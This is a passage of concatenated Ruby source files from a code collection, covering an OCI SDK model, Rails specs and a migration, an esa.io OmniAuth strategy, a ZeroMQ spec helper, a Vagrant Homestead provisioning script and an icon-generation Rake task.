self.is_reboot_required_for_installation = attributes[:'isRebootRequiredForInstallation'] unless attributes[:'isRebootRequiredForInstallation'].nil?
raise 'You cannot provide both :isRebootRequiredForInstallation and :is_reboot_required_for_installation' if attributes.key?(:'isRebootRequiredForInstallation') && attributes.key?(:'is_reboot_required_for_installation')
self.is_reboot_required_for_installation = attributes[:'is_reboot_required_for_installation'] unless attributes[:'is_reboot_required_for_installation'].nil?
end
# rubocop:enable Metrics/CyclomaticComplexity, Metrics/AbcSize, Metrics/PerceivedComplexity
# rubocop:enable Metrics/MethodLength, Layout/EmptyLines, Style/SymbolLiteral
# Custom attribute writer method checking allowed values (enum).
# @param [Object] update_type Object to be assigned
def update_type=(update_type)
# rubocop:disable Style/ConditionalAssignment
# Unknown values from newer API versions map to a sentinel instead of
# raising, keeping old clients forward-compatible with new responses.
if update_type && !UPDATE_TYPE_ENUM.include?(update_type)
OCI.logger.debug("Unknown value for 'update_type' [" + update_type + "]. Mapping to 'UPDATE_TYPE_UNKNOWN_ENUM_VALUE'") if OCI.logger
@update_type = UPDATE_TYPE_UNKNOWN_ENUM_VALUE
else
@update_type = update_type
end
# rubocop:enable Style/ConditionalAssignment
end
# Custom attribute writer method checking allowed values (enum).
# @param [Object] is_eligible_for_installation Object to be assigned
def is_eligible_for_installation=(is_eligible_for_installation)
# rubocop:disable Style/ConditionalAssignment
if is_eligible_for_installation && !IS_ELIGIBLE_FOR_INSTALLATION_ENUM.include?(is_eligible_for_installation)
OCI.logger.debug("Unknown value for 'is_eligible_for_installation' [" + is_eligible_for_installation + "]. Mapping to 'IS_ELIGIBLE_FOR_INSTALLATION_UNKNOWN_ENUM_VALUE'") if OCI.logger
@is_eligible_for_installation = IS_ELIGIBLE_FOR_INSTALLATION_UNKNOWN_ENUM_VALUE
else
@is_eligible_for_installation = is_eligible_for_installation
end
# rubocop:enable Style/ConditionalAssignment
end
# rubocop:disable Metrics/CyclomaticComplexity, Metrics/AbcSize, Metrics/PerceivedComplexity, Layout/EmptyLines
# Checks equality by comparing each attribute.
# @param [Object] other the other object to be compared
def ==(other)
return true if equal?(other)
self.class == other.class &&
display_name == other.display_name &&
name == other.name &&
update_type == other.update_type &&
is_eligible_for_installation == other.is_eligible_for_installation &&
is_reboot_required_for_installation == other.is_reboot_required_for_installation
end
# rubocop:enable Metrics/CyclomaticComplexity, Metrics/AbcSize, Metrics/PerceivedComplexity, Layout/EmptyLines
# @see the `==` method
# @param [Object] other the other object to be compared
def eql?(other)
self == other
end
# rubocop:disable Metrics/AbcSize, Layout/EmptyLines
# Calculates hash code according to all attributes.
# @return [Fixnum] Hash code
def hash
[display_name, name, update_type, is_eligible_for_installation, is_reboot_required_for_installation].hash
end
# rubocop:enable Metrics/AbcSize, Layout/EmptyLines
# rubocop:disable Metrics/AbcSize, Layout/EmptyLines
# Builds the object from hash
# @param [Hash] attributes Model attributes in the form of hash
# @return [Object] Returns the model itself
def build_from_hash(attributes)
return nil unless attributes.is_a?(Hash)
self.class.swagger_types.each_pair do |key, type|
if type =~ /^Array<(.*)>/i
# check to ensure the input is an array given that the attribute
# is documented as an array but the input is not
if attributes[self.class.attribute_map[key]].is_a?(Array)
public_method("#{key}=").call(
attributes[self.class.attribute_map[key]]
.map { |v| OCI::Internal::Util.convert_to_type(Regexp.last_match(1), v) }
)
end
elsif !attributes[self.class.attribute_map[key]].nil?
public_method("#{key}=").call(
OCI::Internal::Util.convert_to_type(type, attributes[self.class.attribute_map[key]])
)
end
# or else data not found in attributes(hash), not an issue as the data can be optional
end
self
end
# rubocop:enable Metrics/AbcSize, Layout/EmptyLines
# Returns the string representation of the object
# @return [String] String presentation of the object
def to_s
to_hash.to_s
end
# Returns the object in the form of hash
# @return [Hash] Returns the object in the form of hash
def to_hash
hash = {}
self.class.attribute_map.each_pair do |attr, param|
value = public_method(attr).call
next if value.nil? && !instance_variable_defined?("@#{attr}")
hash[param] = _to_hash(value)
end
hash
end
private
# Converts one value into its hash representation: arrays recurse
# element-wise (dropping nils), hashes recurse value-wise, objects
# exposing #to_hash delegate to it, and plain scalars pass through.
def _to_hash(value)
  if value.is_a?(Array)
    value.compact.map { |element| _to_hash(element) }
  elsif value.is_a?(Hash)
    value.each_with_object({}) { |(k, v), out| out[k] = _to_hash(v) }
  elsif value.respond_to? :to_hash
    value.to_hash
  else
    value
  end
end
end
end
# rubocop:enable Lint/UnneededCopDisableDirective, Metrics/LineLength
| 42.488095 | 245 | 0.713739 |
396b2cfcd38df31825bc6dfa972558baa7639f18 | 225 | class CreatePackageAddonTypes < ActiveRecord::Migration
# Creates the package_addon_types lookup table: an addon's name, its price
# and how many spots it offers.
def change
  create_table :package_addon_types do |t|
    t.string :name
    # NOTE(review): integer price — presumably the smallest currency unit; confirm.
    t.integer :price
    t.integer :total_spots
    t.timestamps
  end
end
end
| 18.75 | 55 | 0.688889 |
# frozen_string_literal: true
module Perx
  module Rubocop
    # Current release of the gem; bump on each published version.
    VERSION = "0.0.3"
  end
end
| 11.5 | 29 | 0.695652 |
require "spec_helper"
# Specs for the Devices::UnattendedUpgrade job, which pushes OS upgrade
# requests to eligible FarmBot devices.
describe Devices::UnattendedUpgrade do
  # Seeds a Release for every version x channel x platform combination.
  # When a block is given it is yielded once per combination so callers can
  # create a matching device alongside each release.
  def create_example_releases
    ["1.0.0", "1.0.1"].map do |version|
      ["stable", "beta"].map do |channel|
        ["rpi", "rpi3", "rpi4"].map do |platform|
          yield({ fbos_version: version, update_channel: channel }) if block_given?
          Release.create!(image_url: "http://farm.bot/fw.fw",
                          version: version,
                          platform: platform,
                          channel: channel)
        end
      end
    end
  end

  it "runs upgrades" do
    destroy_everything!
    create_example_releases
    dev = FactoryBot.create(:device,
                            fbos_version: "1.0.0",
                            ota_hour: nil,
                            ota_hour_utc: Time.now.utc.hour,
                            last_saw_api: Time.now)
    dev.fbos_config.update!(update_channel: "stable", os_auto_update: true)
    expect_any_instance_of(Device).to receive(:send_upgrade_request)
    Devices::UnattendedUpgrade.run!()
    expect(Device.count).to eq(1)
  end

  it "specifies eligible devices for all update channels" do
    destroy_everything!
    # NOTE(review): the .sample below randomizes each device's OTA hour
    # between "any hour" (nil) and "now", so the created fixtures are
    # non-deterministic — confirm this is intended.
    create_example_releases do |params|
      ota_hour_utc = [nil, Time.now.utc.hour].sample
      device_params = params
        .slice(:fbos_version)
        .merge(ota_hour_utc: ota_hour_utc,
               ota_hour: nil,
               last_saw_api: Time.now)
      FactoryBot
        .create(:device, device_params)
        .fbos_config
        .update!(params.slice(:update_channel))
    end
    ua = Devices::UnattendedUpgrade.new
    devices = ua.all_eligible_devices
    expect(devices.map(&:fbos_version).uniq).to eq(["1.0.0"])
    all_channels = devices.map { |d| d.fbos_config.update_channel }.sort.uniq
    expect(all_channels).to eq(["beta", "stable"])
  end

  it "specifies eligible devices on a single update channel" do
    destroy_everything!
    create_example_releases
    expect(Device.count).to eq(0)
    utc_time = Time.now.utc.hour
    # The "Perfect timing error" guards abort the test if the UTC hour rolls
    # over mid-run, which would silently change device eligibility.
    devices = (1..5).to_a.map do |t|
      raise "Perfect timing error" if utc_time != Time.now.utc.hour
      dev = FactoryBot.create(:device,
                              fbos_version: "1.0.0",
                              ota_hour: nil,
                              ota_hour_utc: t.even? ? utc_time : nil,
                              last_saw_api: Time.now)
      dev.fbos_config.update!(update_channel: "stable",
                              os_auto_update: true)
      dev
    end
    # Ineligible: Different channel.
    devices[0].fbos_config.update!(update_channel: "beta")
    # Ineligible: Already on latest version.
    devices[1].update!(fbos_version: "1.0.1")
    # Ineligible: OS Auto Update disabled.
    devices[2].fbos_config.update!(os_auto_update: false)
    # The remaining two devices are eligible.
    expect(Device.count).to eq(5)
    ua = Devices::UnattendedUpgrade.new
    latest = ua.latest_version("stable")
    expect(latest).to eq("1.0.1")
    eligible_devices = ua.eligible_devices("stable")
    raise "Perfect timing error" if utc_time != Time.now.utc.hour
    # Diagnostic dump explaining why each device disqualified itself when the
    # expectation below is about to fail.
    if eligible_devices.count != 2
      puts "=== BEGIN TEST FAILURE DEBUGGING ==="
      Device
        .includes(:fbos_config)
        .order(id: :asc)
        .all
        .pluck(:id, "fbos_configs.update_channel", :fbos_version, "fbos_configs.os_auto_update", :ota_hour_utc)
        .map do |(id, uc, version, os_auto_update, ota_hour_utc)|
          hr = Time.now.utc.hour
          next "#{id} already up to date" if version == "1.0.1"
          next "#{id} is not in stable" if uc != "stable"
          next "#{id} opted out of auto update" unless os_auto_update
          next "#{id} OTA update hour is #{ota_hour_utc}, not #{hr}" if ota_hour_utc != hr
          "#{id} is OK??"
        end.map { |s| puts s }
    end
    expect(eligible_devices.count).to eq(2)
  end

  it "does not push updates if you are already up to date" do
    Release.destroy_all
    # NOTE(review): "12.0.0-rc9" vs "12.0.0.pre.RC9" — presumably the same
    # version in release-tag and Gem::Version spellings; confirm the
    # latest_version comparison normalizes them.
    Release.create!(image_url: "https://localhost/farmbot-rpi-12.0.0-rc9.fw",
                    version: "12.0.0-rc9",
                    platform: "rpi",
                    channel: "beta")
    device = FactoryBot.create(:device)
    device.update!(last_saw_api: Time.now,
                   ota_hour_utc: nil,
                   fbos_version: "12.0.0.pre.RC9")
    device.fbos_config.update!(os_auto_update: true,
                               update_channel: "beta")
    uu = Devices::UnattendedUpgrade.new
    expect(uu.latest_version("beta")).to eq(device.fbos_version)
    eligible_devices = uu.all_eligible_devices.pluck(:id)
    expect(eligible_devices).to_not include(device.id)
  end
end
| 37.150794 | 111 | 0.60329 |
require 'json'
require 'omniauth-oauth2'
module OmniAuth
  module Strategies
    # OmniAuth OAuth2 strategy for esa.io.
    class Esa < OmniAuth::Strategies::OAuth2
      DEFAULT_SCOPE = 'read'.freeze

      option :name, 'esa'
      option :client_options, site: 'https://api.esa.io'

      uid { raw_info['id'] }

      info do
        {
          nickname: raw_info['screen_name'],
          name: raw_info['name'],
          email: raw_info['email'],
          image: raw_info['icon']
        }
      end

      extra do
        {
          'raw_info' => raw_info
        }
      end

      # Fetches and memoizes the authenticated user's profile from the esa API.
      # Fixed: uses JSON.parse instead of JSON.load — JSON.load enables
      # create_additions and can instantiate arbitrary objects from
      # attacker-influenced payloads; parse is the safe choice for API bodies.
      # @return [Hash] decoded /v1/user response
      def raw_info
        @raw_info ||= JSON.parse(access_token.get('/v1/user').body)
      end

      # Callback URL without query string, as expected by esa's OAuth server.
      def callback_url
        full_host + script_name + callback_path
      end

      # Honors a caller-supplied ?scope= param, falling back to DEFAULT_SCOPE.
      def authorize_params
        super.tap do |params|
          params[:scope] = request.params['scope'] if request.params['scope']
          params[:scope] ||= DEFAULT_SCOPE
        end
      end
    end
  end
end
| 20.73913 | 77 | 0.54717 |
1aae90f51471c36e6dba4d9ea728764c5ffc7c16 | 270 | require 'spec_helper'
describe Spree::Admin::SlideLocationsController do
# Authorization is stubbed so requests reach the controller actions directly.
stub_authorization!
let(:slide_location) { create(:slide_location) }

context '#index' do
  it 'returns 200' do
    get :index
    expect(response.status).to eq(200)
  end
end
end
61ae9694388743c92ad8d73b2cf54c4e7124e59c | 67 | require "fibo/version"
# Gem-skeleton namespace; VERSION is defined in fibo/version.
module Fibo
  # Your code goes here...
end
| 11.166667 | 26 | 0.701493 |
# To run these specs using rake, make sure the 'bones' and 'bones-extras'
# gems are installed. Then execute 'rake spec' from the main directory
# to run all specs.
require File.expand_path(
File.join(File.dirname(__FILE__), %w[.. lib ffi-rzmq]))
require 'thread' # necessary when testing in MRI 1.8 mode
Thread.abort_on_exception = true
require 'openssl'
require 'socket'
require 'securerandom'
# define some version guards so we can turn on/off specs based upon
# the version of the 0mq library that is loaded
# True when the loaded libzmq exposes the 2.x API.
def version2?
  ZMQ::LibZMQ.version2?
end

# True when the loaded libzmq exposes the 3.x API.
def version3?
  ZMQ::LibZMQ.version3?
end
# Pause lengths (seconds) used to give 0mq sockets time to settle.
SLEEP_SHORT = 0.1
SLEEP_LONG = 0.3

# Short waits for message delivery and connects; a longer one for binds and
# a full second for spawned threads to start.
def delivery_sleep
  sleep(SLEEP_SHORT)
end

def connect_sleep
  sleep(SLEEP_SHORT)
end

def bind_sleep
  sleep(SLEEP_LONG)
end

def thread_startup_sleep
  sleep(1.0)
end
# Repeatedly attempts socket.connect(endpoint) until the result code is OK.
# The begin/end-until form is a do-while: connect runs at least once before
# the check. NOTE(review): spins without backoff; presumably the matching
# inproc bind appears quickly — confirm callers bind first.
def connect_to_inproc(socket, endpoint)
  begin
    rc = socket.connect(endpoint)
  end until ZMQ::Util.resultcode_ok?(rc)
end
# Helpers mixed into ffi-rzmq specs: libzmq stubbing, poller bookkeeping and
# random-TCP-port bind/connect with bounded retries.
module APIHelper
  def stub_libzmq
    @err_str_mock = mock("error string")
    # Fixed: the strerror stub key was misspelled :zmq_sterror, so the real
    # LibZMQ.zmq_strerror was never stubbed.
    LibZMQ.stub!(
      :zmq_init => 0,
      :zmq_errno => 0,
      :zmq_strerror => @err_str_mock
    )
  end

  # Lazily creates the poller shared by the poll_* helpers below.
  def poller_setup
    @helper_poller ||= ZMQ::Poller.new
  end

  def poller_register_socket(socket)
    @helper_poller.register(socket, ZMQ::POLLIN)
  end

  def poller_deregister_socket(socket)
    @helper_poller.deregister(socket, ZMQ::POLLIN)
  end

  # Polls registered sockets for readability, timing out after 1 second.
  def poll_delivery
    @helper_poller.poll(1000)
  end

  # Registers +socket+ for reads, runs the block, waits for delivery, then
  # deregisters again.
  def poll_it_for_read(socket, &blk)
    poller_register_socket(socket)
    blk.call
    poll_delivery
    poller_deregister_socket(socket)
  end

  # Generates a random port in 10_000..65_533.
  def random_port
    rand(55534) + 10_000
  end

  # Binds +socket+ to a random local TCP port, retrying up to +max_tries+
  # times. Returns the bound port; raises when every attempt failed.
  def bind_to_random_tcp_port(socket, max_tries = 500)
    port = attempt_on_random_ports(max_tries) { |p| socket.bind(local_transport_string(p)) }
    unless port
      raise "Could not bind to random port successfully; retries all failed!"
    end
    port
  end

  # Connects +socket+ to a random local TCP port, retrying up to +max_tries+
  # times. Returns the connected port; raises when every attempt failed.
  def connect_to_random_tcp_port(socket, max_tries = 500)
    port = attempt_on_random_ports(max_tries) { |p| socket.connect(local_transport_string(p)) }
    unless port
      raise "Could not connect to random port successfully; retries all failed!"
    end
    port
  end

  def local_transport_string(port)
    "tcp://127.0.0.1:#{port}"
  end

  def assert_ok(rc)
    raise "Failed with rc [#{rc}] and errno [#{ZMQ::Util.errno}], msg [#{ZMQ::Util.error_string}]! #{caller(0)}" unless rc >= 0
  end

  private

  # Shared retry loop extracted from the bind/connect helpers above (they
  # were copy-paste duplicates). Yields candidate ports until the block's
  # result code is OK or +max_tries+ is exhausted; returns the winning port
  # or nil when all attempts failed.
  def attempt_on_random_ports(max_tries)
    tries = 0
    rc = -1
    port = nil
    while !ZMQ::Util.resultcode_ok?(rc) && tries < max_tries
      tries += 1
      port = random_port
      rc = yield(port)
    end
    ZMQ::Util.resultcode_ok?(rc) ? port : nil
  end
end
| 22.483607 | 127 | 0.696318 |
# frozen_string_literal: true
require 'rails_helper'
# NOTE(review): this whole suite is disabled via `xdescribe`; re-enable once
# the NIP validation it documents is implemented.
RSpec.describe BillingAddress, type: :model do
  xdescribe 'validations' do
    let(:address) { FactoryBot.build(:billing_address) }

    # NIP is the taxpayer ID number in the Republic of Poland
    describe 'NIP number validation' do
      context 'with valid NIP' do
        it 'is valid' do
          address.nip = '725-18-01-126'
          expect(address).to be_valid
        end
      end

      context 'with NIP = nil' do
        it 'is invalid' do
          address.nip = nil
          expect(address).not_to be_valid
        end
      end

      context "with NIP = ''" do
        it 'is invalid' do
          address.nip = ''
          expect(address).not_to be_valid
        end
      end

      # Correctly formatted but not a real NIP — must be rejected.
      context 'with incorrect NIP number' do
        it 'is invalid' do
          address.nip = '123-45-67-890'
          expect(address).not_to be_valid
        end
      end
    end
  end
end
| 23.195122 | 61 | 0.583596 |
# -*- encoding: utf-8 -*-
$:.push File.expand_path("../lib", __FILE__)
require "ey_config/version"
# Gem metadata for ey_config.
Gem::Specification.new do |s|
  s.name = 'ey_config'
  s.version = EY::Config::VERSION
  s.summary = 'Engine Yard Configuration'
  s.description = 'Access to additional services for Engine Yard customers.'
  s.authors = ["Jacob Burkhart & Michael Broadhead & others"]
  s.email = ["[email protected]"]
  s.files = Dir.glob("{bin,lib}/**/*") + %w(LICENSE README.md)
  s.homepage = 'http://github.com/engineyard/ey_config'
  s.executables = ['ey_config_local']
  # Fixed: dropped `s.default_executable` — the attribute has been deprecated
  # since RubyGems 1.7 and removed in modern RubyGems, where setting it
  # breaks `gem build`. `executables` above covers the same intent.
  s.require_path = 'lib'
end
| 34 | 76 | 0.678019 |
cask 'font-news-cycle' do
# Fetched via an SVN sparse checkout of the google/fonts repository, so
# there is no fixed archive to checksum.
version :latest
sha256 :no_check

# github.com/google/fonts was verified as official when first introduced to the cask
url 'https://github.com/google/fonts/trunk/ofl/newscycle',
    using: :svn,
    revision: '50',
    trust_cert: true
name 'News Cycle'
homepage 'https://www.google.com/fonts/specimen/News%20Cycle'

depends_on macos: '>= :sierra'

font 'NewsCycle-Bold.ttf'
font 'NewsCycle-Regular.ttf'
end
| 25.833333 | 86 | 0.690323 |
5dcb3528c95fd9093d10b8bef8c236c69d7d5158 | 1,065 |
# CocoaPods spec for the BWReportProblem issue-reporting pod.
Pod::Spec.new do |spec|
  spec.name = "BWReportProblem"
  spec.ios.deployment_target = '12.0'
  spec.version = "0.1.1"
  spec.summary = "BWReportProblem let's a user report any issues."
  spec.homepage = "https://github.com/Rajesh9274/BWReportProblem"
  spec.license = { :type => "MIT", :file => "LICENSE" }
  spec.author = { "Rajesh Vekariya" => "[email protected]" }
  spec.platform = :ios
  # NOTE(review): both swift_version (here) and swift_versions (below) are
  # set; the plural list is what newer CocoaPods reads — consider dropping one.
  spec.swift_version = "5.0"
  spec.source = { :git => "https://github.com/Rajesh9274/BWReportProblem.git", :tag => "#{spec.version}" }
  spec.source_files = "BWReportProblem/**/*.{swift}"
  spec.resources = "BWReportProblem/Resources/*.{png,jpeg,jpg,storyboard,xib,xcassets}"
  spec.framework = "UIKit"
  spec.dependency 'Alamofire'
  spec.dependency 'iOSPhotoEditor'
  spec.dependency 'IBAnimatable'
  spec.dependency 'SVProgressHUD'
  spec.dependency 'ReachabilitySwift'
  spec.dependency 'IQKeyboardManagerSwift'
  spec.dependency 'Toast-Swift'
  spec.swift_versions = ['4.2', '5.0', '5.1', '5.2']
end
| 35.5 | 112 | 0.668545 |
base_dir = File.join(File.dirname(File.expand_path(__FILE__)), '..')
# Knife/Chef client settings for the OpsWorks-managed Chef Automate server.
# Relies on +base_dir+ being assigned at the top of this file; keys and CA
# certs live under <repo>/.chef.
log_level                :info
log_location             STDOUT
node_name                'pivotal'
client_key               File.join(base_dir, '.chef', 'private.pem')
syntax_check_cache_path  File.join(base_dir, '.chef', 'syntax_check_cache')
cookbook_path            [File.join(base_dir, 'cookbooks')]
chef_server_url          'https://chefautomateserverlearning-r4vqejllbbralyoz.us-east-1.opsworks-cm.io/organizations/default'
ssl_ca_file              File.join(base_dir, '.chef', 'ca_certs', 'opsworks-cm-ca-2016-root.pem')
trusted_certs_dir        File.join(base_dir, '.chef', 'ca_certs')
| 51.076923 | 125 | 0.668675 |
class CandidateInterface::ReviewApplicationComponent < ViewComponent::Base
# The application form under review, exposed to the component template.
attr_accessor :application_form

def initialize(application_form:)
  @application_form = application_form
end
private
# GOV.UK-formatted date on which applications (re)open: before this cycle's
# apply-opens moment it is the opening date, afterwards the reopening date.
def reopen_date
  if Time.zone.now < CycleTimetable.date(:apply_opens)
    CycleTimetable.apply_opens.to_fs(:govuk_date)
  else
    CycleTimetable.apply_reopens.to_fs(:govuk_date)
  end
end
end
| 27.357143 | 151 | 0.804178 |
class Homestead
# Configures the given Vagrant +config+ from the Homestead +settings+ hash:
# box/network setup, provider tuning, port forwards, SSH keys, shared
# folders, nginx sites, databases and server environment variables.
def Homestead.configure(config, settings)
  # Set The VM Provider
  ENV['VAGRANT_DEFAULT_PROVIDER'] = settings["provider"] ||= "virtualbox"

  # Configure Local Variable To Access Scripts From Remote Location
  scriptDir = File.dirname(__FILE__)

  # Prevent TTY Errors
  config.ssh.shell = "bash -c 'BASH_ENV=/etc/profile exec bash'"

  # Configure The Box
  config.vm.box = settings["box"] ||= "laravel-c6"
  config.vm.hostname = settings["hostname"] ||= "homestead-c6"

  # Configure A Private Network IP
  config.vm.network :private_network, ip: settings["ip"] ||= "192.168.10.10"
  #config.vm.network :public_network, ip: settings["ip"] ||= "192.168.10.10"

  # Configure Additional Networks
  if settings.has_key?("networks")
    settings["networks"].each do |network|
      config.vm.network network["type"], ip: network["ip"], bridge: network["bridge"] ||= nil
    end
  end

  # Configure A Few VirtualBox Settings
  config.vm.provider "virtualbox" do |vb|
    vb.name = settings["name"] ||= "homestead-c6"
    vb.customize ["modifyvm", :id, "--memory", settings["memory"] ||= "2048"]
    vb.customize ["modifyvm", :id, "--cpus", settings["cpus"] ||= "1"]
    vb.customize ["modifyvm", :id, "--natdnsproxy1", "on"]
    vb.customize ["modifyvm", :id, "--natdnshostresolver1", "on"]
    vb.customize ["modifyvm", :id, "--ostype", "redhat_64"]
  end

  # Configure A Few VMware Settings
  ["vmware_fusion", "vmware_workstation"].each do |vmware|
    config.vm.provider vmware do |v|
      v.vmx["displayName"] = "homestead-c6"
      v.vmx["memsize"] = settings["memory"] ||= 2048
      v.vmx["numvcpus"] = settings["cpus"] ||= 1
      v.vmx["guestOS"] = "redhat_64"
    end
  end

  # Configure A Few Parallels Settings
  config.vm.provider "parallels" do |v|
    v.update_guest_tools = true
    v.optimize_power_consumption = false
    v.memory = settings["memory"] ||= 2048
    v.cpus = settings["cpus"] ||= 1
  end

  # Standardize Ports Naming Schema
  # (accepts legacy "to"/"send" keys and normalizes them to "guest"/"host")
  if (settings.has_key?("ports"))
    settings["ports"].each do |port|
      port["guest"] ||= port["to"]
      port["host"] ||= port["send"]
      port["protocol"] ||= "tcp"
    end
  else
    settings["ports"] = []
  end

  # Default Port Forwarding
  default_ports = {
    80 => 8000,
    443 => 44300,
    3306 => 33060,
    5432 => 54320
  }

  # Use Default Port Forwarding Unless Overridden
  default_ports.each do |guest, host|
    unless settings["ports"].any? { |mapping| mapping["guest"] == guest }
      config.vm.network "forwarded_port", guest: guest, host: host, auto_correct: true
    end
  end

  # Add Custom Ports From Configuration
  if settings.has_key?("ports")
    settings["ports"].each do |port|
      config.vm.network "forwarded_port", guest: port["guest"], host: port["host"], protocol: port["protocol"], auto_correct: true
    end
  end

  # Configure The Public Key For SSH Access
  if settings.include? 'authorize'
    config.vm.provision "shell" do |s|
      s.inline = "echo $1 | grep -xq \"$1\" /home/vagrant/.ssh/authorized_keys || echo $1 | tee -a /home/vagrant/.ssh/authorized_keys"
      s.args = [File.read(File.expand_path(settings["authorize"]))]
    end
  end

  # Copy The SSH Private Keys To The Box
  if settings.include? 'keys'
    settings["keys"].each do |key|
      config.vm.provision "shell" do |s|
        s.privileged = false
        s.inline = "echo \"$1\" > /home/vagrant/.ssh/$2 && chmod 600 /home/vagrant/.ssh/$2"
        s.args = [File.read(File.expand_path(key)), key.split('/').last]
      end
    end
  end

  # Register All Of The Configured Shared Folders
  if settings.include? 'folders'
    settings["folders"].each do |folder|
      mount_opts = []

      if (folder["type"] == "nfs")
        mount_opts = folder["mount_opts"] ? folder["mount_opts"] : ['actimeo=1']
      end

      config.vm.synced_folder folder["map"], folder["to"], type: folder["type"] ||= nil, mount_options: mount_opts
    end
  end

  # Install All The Configured Nginx Sites
  config.vm.provision "shell" do |s|
    s.path = scriptDir + "/clear-nginx.sh"
  end

  # NOTE(review): unlike the sections above, this does not guard against a
  # missing "sites" key; a settings file without "sites" raises NoMethodError.
  settings["sites"].each do |site|
    type = site["type"] ||= "laravel"

    if (site.has_key?("hhvm") && site["hhvm"])
      type = "hhvm"
    end

    if (type == "symfony")
      type = "symfony2"
    end

    config.vm.provision "shell" do |s|
      s.path = scriptDir + "/serve-#{type}.sh"
      s.args = [site["map"], site["to"], site["port"] ||= "80", site["ssl"] ||= "443"]
    end
  end

  # Configure All Of The Configured Databases
  if settings.has_key?("databases")
    settings["databases"].each do |db|
      config.vm.provision "shell" do |s|
        s.path = scriptDir + "/create-mysql.sh"
        s.args = [db]
      end

      # config.vm.provision "shell" do |s|
      #   s.path = scriptDir + "/create-postgres.sh"
      #   s.args = [db]
      # end
    end
  end

  # Configure All Of The Server Environment Variables
  config.vm.provision "shell" do |s|
    s.path = scriptDir + "/clear-variables.sh"
  end

  if settings.has_key?("variables")
    settings["variables"].each do |var|
      #config.vm.provision "shell" do |s|
      #  s.inline = "echo \"\nenv[$1] = '$2'\" >> /etc/php-fpm.d/www.conf"
      #  s.args = [var["key"], var["value"]]
      #end
      config.vm.provision "shell" do |s|
        s.inline = "echo \"\n# Set Homestead Environment Variable\nexport $1=$2\" >> /home/vagrant/.profile"
        s.args = [var["key"], var["value"]]
      end
    end

    config.vm.provision "shell" do |s|
      s.inline = "service php-fpm restart"
    end
  end

  # Update Composer On Every Provision
  config.vm.provision "shell" do |s|
    s.inline = "/usr/local/bin/composer self-update"
  end

  # Configure Blackfire.io
  if settings.has_key?("blackfire")
    config.vm.provision "shell" do |s|
      s.path = scriptDir + "/blackfire.sh"
      s.args = [
        settings["blackfire"][0]["id"],
        settings["blackfire"][0]["token"],
        settings["blackfire"][0]["client-id"],
        settings["blackfire"][0]["client-token"]
      ]
    end
  end
end
end
| 32.215 | 136 | 0.582027 |
f88779ed9110d8e5444c2b9f409bffef3b33dd48 | 917 | # frozen_string_literal: true
require 'rails_helper'
# Request specs for the Crossref submission log pages; every request is made
# as a signed-in platform admin.
RSpec.describe "CrossrefSubmissionLogs", type: :request do
  let(:admin) { create(:platform_admin) }

  before { sign_in(admin) }

  describe "#index" do
    it do
      get crossref_submission_logs_path
      expect(response).to render_template(:index)
    end
  end

  describe "#show" do
    let(:log) { create(:crossref_submission_log, response_xml: "<xml>Hello there!</xml>") }

    context "with the correct file/field" do
      it do
        get crossref_submission_log_file_path(log.id, file: "response_xml")
        expect(response).to render_template(:show)
        expect(response.body).to match(/Hello there!/)
      end
    end

    # Only known log fields may be fetched; anything else is rejected.
    context "with a weird/bad file/field" do
      it do
        get crossref_submission_log_file_path(log.id, file: "not_a_thing")
        expect(response).to have_http_status(:unauthorized)
      end
    end
  end
end
| 25.472222 | 91 | 0.68048 |
ICONS_DIR = 'public'
# Master artwork from which every site icon is generated.
ORIGINAL_IMAGE = 'media/huginn-icon-square.svg'

desc "Generate site icons from #{ORIGINAL_IMAGE}"
task :icons => 'icon:all'
# Rake tasks generating iOS touch icons, Android launcher icons and the
# Android web-app manifest from ORIGINAL_IMAGE into ICONS_DIR.
namespace :icon do
  # iOS
  task :all => :ios

  [
    57, 114,
    60, 120, 180,
    72, 144,
    76, 152,
  ].each do |width|
    sizes = '%1$dx%1$d' % width
    filename = "apple-touch-icon-#{sizes}.png"
    icon = File.join(ICONS_DIR, filename)

    file icon => ORIGINAL_IMAGE do |t|
      puts "Generating #{t.name}"
      convert_image t.source, t.name, width: width
    end

    task :ios => icon
  end

  # Android
  task :all => :android

  android_icons = [
    36, 72, 144,
    48, 96, 192,
  ].map do |width|
    sizes = '%1$dx%1$d' % width
    # Fixed: the trailing `% width` was a no-op format call on an
    # already-interpolated string and has been removed.
    filename = "android-chrome-#{sizes}.png"
    icon = File.join(ICONS_DIR, filename)

    file icon => ORIGINAL_IMAGE do |t|
      puts "Generating #{t.name}"
      convert_image t.source, t.name, width: width, round: true
    end

    task :android => icon

    # Manifest entry for this icon. Fixed: the src value had been corrupted
    # to "/#(unknown)"; it must point at the generated icon file.
    {
      src: "/#{filename}",
      sizes: sizes,
      type: 'image/png',
      density: (width / 48.0).to_s,
    }
  end

  manifest = File.join(ICONS_DIR, 'manifest.json')

  file manifest => __FILE__ do |t|
    puts "Generating #{t.name}"
    require 'json'
    json = {
      name: 'Huginn',
      icons: android_icons
    }
    File.write(t.name, JSON.pretty_generate(json))
  end

  task :android => manifest
end
require 'mini_magick'
# Converts +source+ into +target+ with MiniMagick.
# @param source [String] path to the source image
# @param target [String] output path; its file extension selects the format
# @param options [Hash] :width (Integer) resizes into a width x width box,
#   :round (Boolean) applies rounded corners via an alpha mask
def convert_image(source, target, options = {}) # width: nil, round: false
  ext = target[/(?<=\.)[^.]+\z/] || 'png'
  original = MiniMagick::Image.open(source)
  result = original
  result.format ext
  if width = options[:width]
    # ImageMagick's ">" flag shrinks only — never upscales past the original.
    result.thumbnail '%1$dx%1$d>' % width
  else
    width = result[:width]
  end
  if options[:round]
    # Corner radius scaled as 80/512 of the icon width.
    radius = (Rational(80, 512) * width).round
    mask = MiniMagick::Image.create(ext) { |tmp| result.write(tmp) }
    mask.mogrify do |image|
      image.alpha 'transparent'
      image.background 'none'
      image.fill 'white'
      image.draw 'roundrectangle 0,0,%1$d,%1$d,%2$d,%2$d' % [width, radius]
    end
    # DstIn keeps only the pixels covered by the white rounded rectangle.
    result = result.composite(mask) do |image|
      image.alpha 'set'
      image.compose 'DstIn'
    end
  end
  result.strip
  result.write(target)
end
| 21.075472 | 75 | 0.599821 |
module Fletcher
  # ActiveSupport-style string inflections, mixed into ::String at the bottom
  # of this file.
  module String
    # Strips surrounding whitespace.
    def sanitize
      self.strip
    end

    # Converts an underscored/path-style string to CamelCase.
    #   "foo_bar/baz".camelize    #=> "FooBar::Baz"
    #   "foo_bar".camelize(false) #=> "fooBar"
    # @param first_letter_in_uppercase [Boolean] lowerCamelCase when false
    def camelize(first_letter_in_uppercase = true)
      lower_case_and_underscored_word = self.dup.underscore
